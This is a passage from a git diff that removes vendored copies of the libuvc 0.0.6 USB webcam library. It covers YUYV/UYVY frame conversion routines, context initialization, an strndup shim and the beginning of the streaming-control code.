-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_GRAY8;
-  out->step = in->width;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *py = out->data;
-  uint8_t *py_end = py + out->data_bytes;
-
-  while (py < py_end) {
-    IYUYV2Y(pyuv, py);
-
-    py += 1;
-    pyuv += 2;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2UV(pyuv, puv) { \
-    (puv)[0] = (pyuv[1]); \
-    }
-
-/** @brief Convert a frame from YUYV to UV (GRAY8)
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out GRAY8 frame
- */
-uvc_error_t uvc_yuyv2uv(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_GRAY8;
-  out->step = in->width;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *puv = out->data;
-  uint8_t *puv_end = puv + out->data_bytes;
-
-  while (puv < puv_end) {
-    IYUYV2UV(pyuv, puv);
-
-    puv += 1;
-    pyuv += 2;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IUYVY2RGB_2(pyuv, prgb) { \
-    int r = (22987 * ((pyuv)[2] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[0] - 128) - 11698 * ((pyuv)[2] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[0] - 128)) >> 14; \
-    (prgb)[0] = sat((pyuv)[1] + r); \
-    (prgb)[1] = sat((pyuv)[1] + g); \
-    (prgb)[2] = sat((pyuv)[1] + b); \
-    (prgb)[3] = sat((pyuv)[3] + r); \
-    (prgb)[4] = sat((pyuv)[3] + g); \
-    (prgb)[5] = sat((pyuv)[3] + b); \
-    }
-#define IUYVY2RGB_16(pyuv, prgb) IUYVY2RGB_8(pyuv, prgb); IUYVY2RGB_8(pyuv + 16, prgb + 24);
-#define IUYVY2RGB_8(pyuv, prgb) IUYVY2RGB_4(pyuv, prgb); IUYVY2RGB_4(pyuv + 8, prgb + 12);
-#define IUYVY2RGB_4(pyuv, prgb) IUYVY2RGB_2(pyuv, prgb); IUYVY2RGB_2(pyuv + 4, prgb + 6);
-
-/** @brief Convert a frame from UYVY to RGB
- * @ingroup frame
- * @param ini UYVY frame
- * @param out RGB frame
- */
-uvc_error_t uvc_uyvy2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_UYVY)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width *3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *prgb = out->data;
-  uint8_t *prgb_end = prgb + out->data_bytes;
-
-  while (prgb < prgb_end) {
-    IUYVY2RGB_8(pyuv, prgb);
-
-    prgb += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IUYVY2BGR_2(pyuv, pbgr) { \
-    int r = (22987 * ((pyuv)[2] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[0] - 128) - 11698 * ((pyuv)[2] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[0] - 128)) >> 14; \
-    (pbgr)[0] = sat((pyuv)[1] + b); \
-    (pbgr)[1] = sat((pyuv)[1] + g); \
-    (pbgr)[2] = sat((pyuv)[1] + r); \
-    (pbgr)[3] = sat((pyuv)[3] + b); \
-    (pbgr)[4] = sat((pyuv)[3] + g); \
-    (pbgr)[5] = sat((pyuv)[3] + r); \
-    }
-#define IUYVY2BGR_16(pyuv, pbgr) IUYVY2BGR_8(pyuv, pbgr); IUYVY2BGR_8(pyuv + 16, pbgr + 24);
-#define IUYVY2BGR_8(pyuv, pbgr) IUYVY2BGR_4(pyuv, pbgr); IUYVY2BGR_4(pyuv + 8, pbgr + 12);
-#define IUYVY2BGR_4(pyuv, pbgr) IUYVY2BGR_2(pyuv, pbgr); IUYVY2BGR_2(pyuv + 4, pbgr + 6);
-
-/** @brief Convert a frame from UYVY to BGR
- * @ingroup frame
- * @param ini UYVY frame
- * @param out BGR frame
- */
-uvc_error_t uvc_uyvy2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_UYVY)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_BGR;
-  out->step = in->width *3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *pbgr = out->data;
-  uint8_t *pbgr_end = pbgr + out->data_bytes;
-
-  while (pbgr < pbgr_end) {
-    IUYVY2BGR_8(pyuv, pbgr);
-
-    pbgr += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Convert a frame to RGB
- * @ingroup frame
- *
- * @param in non-RGB frame
- * @param out RGB frame
- */
-uvc_error_t uvc_any2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  switch (in->frame_format) {
-    case UVC_FRAME_FORMAT_YUYV:
-      return uvc_yuyv2rgb(in, out);
-    case UVC_FRAME_FORMAT_UYVY:
-      return uvc_uyvy2rgb(in, out);
-    case UVC_FRAME_FORMAT_RGB:
-      return uvc_duplicate_frame(in, out);
-    default:
-      return UVC_ERROR_NOT_SUPPORTED;
-  }
-}
-
-/** @brief Convert a frame to BGR
- * @ingroup frame
- *
- * @param in non-BGR frame
- * @param out BGR frame
- */
-uvc_error_t uvc_any2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  switch (in->frame_format) {
-    case UVC_FRAME_FORMAT_YUYV:
-      return uvc_yuyv2bgr(in, out);
-    case UVC_FRAME_FORMAT_UYVY:
-      return uvc_uyvy2bgr(in, out);
-    case UVC_FRAME_FORMAT_BGR:
-      return uvc_duplicate_frame(in, out);
-    default:
-      return UVC_ERROR_NOT_SUPPORTED;
-  }
-}
diff --git a/thirdparty/libuvc-0.0.6/src/init.c b/thirdparty/libuvc-0.0.6/src/init.c
deleted file mode 100644
index 041fe58..0000000
--- a/thirdparty/libuvc-0.0.6/src/init.c
+++ /dev/null
@@ -1,163 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
-\mainpage libuvc: a cross-platform library for USB video devices
-
-\b libuvc is a library that supports enumeration, control and streaming
-for USB Video Class (UVC) devices, such as consumer webcams.
-
-\section features Features
-\li UVC device \ref device "discovery and management" API
-\li \ref streaming "Video streaming" (device to host) with asynchronous/callback and synchronous/polling modes
-\li Read/write access to standard \ref ctrl "device settings"
-\li \ref frame "Conversion" between various formats: RGB, YUV, JPEG, etc.
-\li Tested on Mac and Linux, portable to Windows and some BSDs
-
-\section roadmap Roadmap
-\li Bulk-mode image capture
-\li One-shot image capture
-\li Improved support for standard settings
-\li Support for "extended" (vendor-defined) settings
-
-\section misc Misc.
-\p The source code can be found at https://github.com/ktossell/libuvc. To build
-the library, install <a href="http://libusb.org/">libusb</a> 1.0+ and run:
-
-\code
-$ git clone https://github.com/ktossell/libuvc.git
-$ cd libuvc
-$ mkdir build
-$ cd build
-$ cmake -DCMAKE_BUILD_TYPE=Release ..
-$ make && make install
-\endcode
-
-\section Example
-In this example, libuvc is used to acquire images in a 30 fps, 640x480
-YUV stream from a UVC device such as a standard webcam.
-
-\include example.c
-
-*/
-
-/**
- * @defgroup init Library initialization/deinitialization
- * @brief Setup routines used to construct UVC access contexts
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal
- * @brief Event handler thread
- * There's one of these per UVC context.
- * @todo We shouldn't run this if we don't own the USB context
- */
-void *_uvc_handle_events(void *arg) {
-  uvc_context_t *ctx = (uvc_context_t *) arg;
-
-  while (!ctx->kill_handler_thread)
-    libusb_handle_events_completed(ctx->usb_ctx, &ctx->kill_handler_thread);
-  return NULL;
-}
-
-/** @brief Initializes the UVC context
- * @ingroup init
- *
- * @note If you provide your own USB context, you must handle
- * libusb event processing using a function such as libusb_handle_events.
- *
- * @param[out] pctx The location where the context reference should be stored.
- * @param[in]  usb_ctx Optional USB context to use
- * @return Error opening context or UVC_SUCCESS
- */
-uvc_error_t uvc_init(uvc_context_t **pctx, struct libusb_context *usb_ctx) {
-  uvc_error_t ret = UVC_SUCCESS;
-  uvc_context_t *ctx = calloc(1, sizeof(*ctx));
-
-  if (usb_ctx == NULL) {
-    ret = libusb_init(&ctx->usb_ctx);
-    ctx->own_usb_ctx = 1;
-    if (ret != UVC_SUCCESS) {
-      free(ctx);
-      ctx = NULL;
-    }
-  } else {
-    ctx->own_usb_ctx = 0;
-    ctx->usb_ctx = usb_ctx;
-  }
-
-  if (ctx != NULL)
-    *pctx = ctx;
-
-  return ret;
-}
-
-/**
- * @brief Closes the UVC context, shutting down any active cameras.
- * @ingroup init
- *
- * @note This function invalides any existing references to the context's
- * cameras.
- *
- * If no USB context was provided to #uvc_init, the UVC-specific USB
- * context will be destroyed.
- *
- * @param ctx UVC context to shut down
- */
-void uvc_exit(uvc_context_t *ctx) {
-  uvc_device_handle_t *devh;
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    uvc_close(devh);
-  }
-
-  if (ctx->own_usb_ctx)
-    libusb_exit(ctx->usb_ctx);
-
-  free(ctx);
-}
-
-/**
- * @internal
- * @brief Spawns a handler thread for the context
- * @ingroup init
- *
- * This should be called at the end of a successful uvc_open if no devices
- * are already open (and being handled).
- */
-void uvc_start_handler_thread(uvc_context_t *ctx) {
-  if (ctx->own_usb_ctx)
-    pthread_create(&ctx->handler_thread, NULL, _uvc_handle_events, (void*) ctx);
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/misc.c b/thirdparty/libuvc-0.0.6/src/misc.c
deleted file mode 100644
index 8ce850f..0000000
--- a/thirdparty/libuvc-0.0.6/src/misc.c
+++ /dev/null
@@ -1,58 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-#include <string.h>
-#include <stdlib.h>
-
-#if __APPLE__
-char *strndup(const char *s, size_t n) {
-  size_t src_n = 0;
-  const char *sp = s;
-  char *d;
-
-  while (*sp++)
-    src_n++;
-
-  if (src_n < n)
-    n = src_n;
-
-  d = malloc(n + 1);
-
-  memcpy(d, s, n);
-  
-  d[n] = '\0';
-
-  return d;
-}
-#endif
-
diff --git a/thirdparty/libuvc-0.0.6/src/stream.c b/thirdparty/libuvc-0.0.6/src/stream.c
deleted file mode 100644
index d309628..0000000
--- a/thirdparty/libuvc-0.0.6/src/stream.c
+++ /dev/null
@@ -1,1288 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup streaming Streaming control functions
- * @brief Tools for creating, managing and consuming video streams
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-#include "errno.h"
-
-#ifdef _MSC_VER
-
-#define DELTA_EPOCH_IN_MICROSECS  116444736000000000Ui64
-
-// gettimeofday - get time of day for Windows;
-// A gettimeofday implementation for Microsoft Windows;
-// Public domain code, author "ponnada";
-int gettimeofday(struct timeval *tv, struct timezone *tz)
-{
-    FILETIME ft;
-    unsigned __int64 tmpres = 0;
-    static int tzflag = 0;
-    if (NULL != tv)
-    {
-        GetSystemTimeAsFileTime(&ft);
-        tmpres |= ft.dwHighDateTime;
-        tmpres <<= 32;
-        tmpres |= ft.dwLowDateTime;
-        tmpres /= 10;
-        tmpres -= DELTA_EPOCH_IN_MICROSECS;
-        tv->tv_sec = (long)(tmpres / 1000000UL);
-        tv->tv_usec = (long)(tmpres % 1000000UL);
-    }
-    return 0;
-}
-#endif // _MSC_VER
-uvc_frame_desc_t *uvc_find_frame_desc_stream(uvc_stream_handle_t *strmh,
-    uint16_t format_id, uint16_t frame_id);
-uvc_frame_desc_t *uvc_find_frame_desc(uvc_device_handle_t *devh,
-    uint16_t format_id, uint16_t frame_id);
-void *_uvc_user_caller(void *arg);
-void _uvc_populate_frame(uvc_stream_handle_t *strmh);
-
-struct format_table_entry {
-  enum uvc_frame_format format;
-  uint8_t abstract_fmt;
-  uint8_t guid[16];
-  int children_count;
-  enum uvc_frame_format *children;
-};
-
-struct format_table_entry *_get_format_entry(enum uvc_frame_format format) {
-  #define ABS_FMT(_fmt, _num, ...) \
-    case _fmt: { \
-    static enum uvc_frame_format _fmt##_children[] = __VA_ARGS__; \
-    static struct format_table_entry _fmt##_entry = { \
-      _fmt, 0, {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}, _num, _fmt##_children }; \
-    return &_fmt##_entry; }
-
-  #define FMT(_fmt, ...) \
-    case _fmt: { \
-    static struct format_table_entry _fmt##_entry = { \
-      _fmt, 0, __VA_ARGS__, 0, NULL }; \
-    return &_fmt##_entry; }
-
-  switch(format) {
-    /* Define new formats here */
-    ABS_FMT(UVC_FRAME_FORMAT_ANY, 2,
-      {UVC_FRAME_FORMAT_UNCOMPRESSED, UVC_FRAME_FORMAT_COMPRESSED})
-
-    ABS_FMT(UVC_FRAME_FORMAT_UNCOMPRESSED, 4,
-      {UVC_FRAME_FORMAT_YUYV, UVC_FRAME_FORMAT_UYVY, UVC_FRAME_FORMAT_GRAY8,
-      UVC_FRAME_FORMAT_GRAY16})
-    FMT(UVC_FRAME_FORMAT_YUYV,
-      {'Y',  'U',  'Y',  '2', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_UYVY,
-      {'U',  'Y',  'V',  'Y', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_GRAY8,
-      {'Y',  '8',  '0',  '0', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_GRAY16,
-      {'Y',  '1',  '6',  ' ', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_BY8,
-      {'B',  'Y',  '8',  ' ', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_BA81,
-      {'B',  'A',  '8',  '1', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SGRBG8,
-      {'G',  'R',  'B',  'G', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SGBRG8,
-      {'G',  'B',  'R',  'G', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SRGGB8,
-      {'R',  'G',  'G',  'B', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SBGGR8,
-      {'B',  'G',  'G',  'R', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    ABS_FMT(UVC_FRAME_FORMAT_COMPRESSED, 1,
-      {UVC_FRAME_FORMAT_MJPEG})
-    FMT(UVC_FRAME_FORMAT_MJPEG,
-      {'M',  'J',  'P',  'G'})
-
-    default:
-      return NULL;
-  }
-
-  #undef ABS_FMT
-  #undef FMT
-}
-
-static uint8_t _uvc_frame_format_matches_guid(enum uvc_frame_format fmt, uint8_t guid[16]) {
-  struct format_table_entry *format;
-  int child_idx;
-
-  format = _get_format_entry(fmt);
-  if (!format)
-    return 0;
-
-  if (!format->abstract_fmt && !memcmp(guid, format->guid, 16))
-    return 1;
-
-  for (child_idx = 0; child_idx < format->children_count; child_idx++) {
-    if (_uvc_frame_format_matches_guid(format->children[child_idx], guid))
-      return 1;
-  }
-
-  return 0;
-}
-
-static enum uvc_frame_format uvc_frame_format_for_guid(uint8_t guid[16]) {
-  struct format_table_entry *format;
-  enum uvc_frame_format fmt;
-
-  for (fmt = 0; fmt < UVC_FRAME_FORMAT_COUNT; ++fmt) {
-    format = _get_format_entry(fmt);
-    if (!format || format->abstract_fmt)
-      continue;
-    if (!memcmp(format->guid, guid, 16))
-      return format->format;
-  }
-
-  return UVC_FRAME_FORMAT_UNKNOWN;
-}
-
-/** @internal
- * Run a streaming control query
- * @param[in] devh UVC device
- * @param[in,out] ctrl Control block
- * @param[in] probe Whether this is a probe query or a commit query
- * @param[in] req Query type
- */
-uvc_error_t uvc_query_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uint8_t probe,
-    enum uvc_req_code req) {
-  uint8_t buf[34];
-  size_t len;
-  uvc_error_t err;
-
-  memset(buf, 0, sizeof(buf));
-
-  if (devh->info->ctrl_if.bcdUVC >= 0x0110)
-    len = 34;
-  else
-    len = 26;
-
-  /* prepare for a SET transfer */
-  if (req == UVC_SET_CUR) {
-    SHORT_TO_SW(ctrl->bmHint, buf);
-    buf[2] = ctrl->bFormatIndex;
-    buf[3] = ctrl->bFrameIndex;
-    INT_TO_DW(ctrl->dwFrameInterval, buf + 4);
-    SHORT_TO_SW(ctrl->wKeyFrameRate, buf + 8);
-    SHORT_TO_SW(ctrl->wPFrameRate, buf + 10);
-    SHORT_TO_SW(ctrl->wCompQuality, buf + 12);
-    SHORT_TO_SW(ctrl->wCompWindowSize, buf + 14);
-    SHORT_TO_SW(ctrl->wDelay, buf + 16);
-    INT_TO_DW(ctrl->dwMaxVideoFrameSize, buf + 18);
-    INT_TO_DW(ctrl->dwMaxPayloadTransferSize, buf + 22);
-
-    if (len == 34) {
-      INT_TO_DW ( ctrl->dwClockFrequency, buf + 26 );
-      buf[30] = ctrl->bmFramingInfo;
-      buf[31] = ctrl->bPreferredVersion;
-      buf[32] = ctrl->bMinVersion;
-      buf[33] = ctrl->bMaxVersion;
-      /** @todo support UVC 1.1 */
-    }
-  }
-
-  /* do the transfer */
-  err = libusb_control_transfer(
-      devh->usb_devh,
-      req == UVC_SET_CUR ? 0x21 : 0xA1,
-      req,
-      probe ? (UVC_VS_PROBE_CONTROL << 8) : (UVC_VS_COMMIT_CONTROL << 8),
-      ctrl->bInterfaceNumber,
-      buf, len, 0
-  );
-
-  if (err <= 0) {
-    return err;
-  }
-
-  /* now decode following a GET transfer */
-  if (req != UVC_SET_CUR) {
-    ctrl->bmHint = SW_TO_SHORT(buf);
-    ctrl->bFormatIndex = buf[2];
-    ctrl->bFrameIndex = buf[3];
-    ctrl->dwFrameInterval = DW_TO_INT(buf + 4);
-    ctrl->wKeyFrameRate = SW_TO_SHORT(buf + 8);
-    ctrl->wPFrameRate = SW_TO_SHORT(buf + 10);
-    ctrl->wCompQuality = SW_TO_SHORT(buf + 12);
-    ctrl->wCompWindowSize = SW_TO_SHORT(buf + 14);
-    ctrl->wDelay = SW_TO_SHORT(buf + 16);
-    ctrl->dwMaxVideoFrameSize = DW_TO_INT(buf + 18);
-    ctrl->dwMaxPayloadTransferSize = DW_TO_INT(buf + 22);
-
-    if (len == 34) {
-      ctrl->dwClockFrequency = DW_TO_INT ( buf + 26 );
-      ctrl->bmFramingInfo = buf[30];
-      ctrl->bPreferredVersion = buf[31];
-      ctrl->bMinVersion = buf[32];
-      ctrl->bMaxVersion = buf[33];
-      /** @todo support UVC 1.1 */
-    }
-    else
-      ctrl->dwClockFrequency = devh->info->ctrl_if.dwClockFrequency;
-
-    /* fix up block for cameras that fail to set dwMax* */
-    if (ctrl->dwMaxVideoFrameSize == 0) {
-      uvc_frame_desc_t *frame = uvc_find_frame_desc(devh, ctrl->bFormatIndex, ctrl->bFrameIndex);
-
-      if (frame) {
-        ctrl->dwMaxVideoFrameSize = frame->dwMaxVideoFrameBufferSize;
-      }
-    }
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Reconfigure stream with a new stream format.
- * @ingroup streaming
- *
- * This may be executed whether or not the stream is running.
- *
- * @param[in] strmh Stream handle
- * @param[in] ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- */
-uvc_error_t uvc_stream_ctrl(uvc_stream_handle_t *strmh, uvc_stream_ctrl_t *ctrl) {
-  uvc_error_t ret;
-
-  if (strmh->stream_if->bInterfaceNumber != ctrl->bInterfaceNumber)
-    return UVC_ERROR_INVALID_PARAM;
-
-  /* @todo Allow the stream to be modified without restarting the stream */
-  if (strmh->running)
-    return UVC_ERROR_BUSY;
-
-  ret = uvc_query_stream_ctrl(strmh->devh, ctrl, 0, UVC_SET_CUR);
-  if (ret != UVC_SUCCESS)
-    return ret;
-
-  strmh->cur_ctrl = *ctrl;
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Find the descriptor for a specific frame configuration
- * @param stream_if Stream interface
- * @param format_id Index of format class descriptor
- * @param frame_id Index of frame descriptor
- */
-static uvc_frame_desc_t *_uvc_find_frame_desc_stream_if(uvc_streaming_interface_t *stream_if,
-    uint16_t format_id, uint16_t frame_id) {
- 
-  uvc_format_desc_t *format = NULL;
-  uvc_frame_desc_t *frame = NULL;
-
-  DL_FOREACH(stream_if->format_descs, format) {
-    if (format->bFormatIndex == format_id) {
-      DL_FOREACH(format->frame_descs, frame) {
-        if (frame->bFrameIndex == frame_id)
-          return frame;
-      }
-    }
-  }
-
-  return NULL;
-}
-
-uvc_frame_desc_t *uvc_find_frame_desc_stream(uvc_stream_handle_t *strmh,
-    uint16_t format_id, uint16_t frame_id) {
-  return _uvc_find_frame_desc_stream_if(strmh->stream_if, format_id, frame_id);
-}
-
-/** @internal
- * @brief Find the descriptor for a specific frame configuration
- * @param devh UVC device
- * @param format_id Index of format class descriptor
- * @param frame_id Index of frame descriptor
- */
-uvc_frame_desc_t *uvc_find_frame_desc(uvc_device_handle_t *devh,
-    uint16_t format_id, uint16_t frame_id) {
- 
-  uvc_streaming_interface_t *stream_if;
-  uvc_frame_desc_t *frame;
-
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    frame = _uvc_find_frame_desc_stream_if(stream_if, format_id, frame_id);
-    if (frame)
-      return frame;
-  }
-
-  return NULL;
-}
-
-/** Get a negotiated streaming control block for some common parameters.
- * @ingroup streaming
- *
- * @param[in] devh Device handle
- * @param[in,out] ctrl Control block
- * @param[in] format_class Type of streaming format
- * @param[in] width Desired frame width
- * @param[in] height Desired frame height
- * @param[in] fps Frame rate, frames per second
- */
-uvc_error_t uvc_get_stream_ctrl_format_size(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    enum uvc_frame_format cf,
-    int width, int height,
-    int fps) {
-  uvc_streaming_interface_t *stream_if;
-
-  /* find a matching frame descriptor and interval */
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    uvc_format_desc_t *format;
-
-    DL_FOREACH(stream_if->format_descs, format) {
-      uvc_frame_desc_t *frame;
-
-      if (!_uvc_frame_format_matches_guid(cf, format->guidFormat))
-        continue;
-
-      DL_FOREACH(format->frame_descs, frame) {
-        if (frame->wWidth != width || frame->wHeight != height)
-          continue;
-
-        uint32_t *interval;
-
-        ctrl->bInterfaceNumber = stream_if->bInterfaceNumber;
-        UVC_DEBUG("claiming streaming interface %d", stream_if->bInterfaceNumber );
-        uvc_claim_if(devh, ctrl->bInterfaceNumber);
-        /* get the max values */
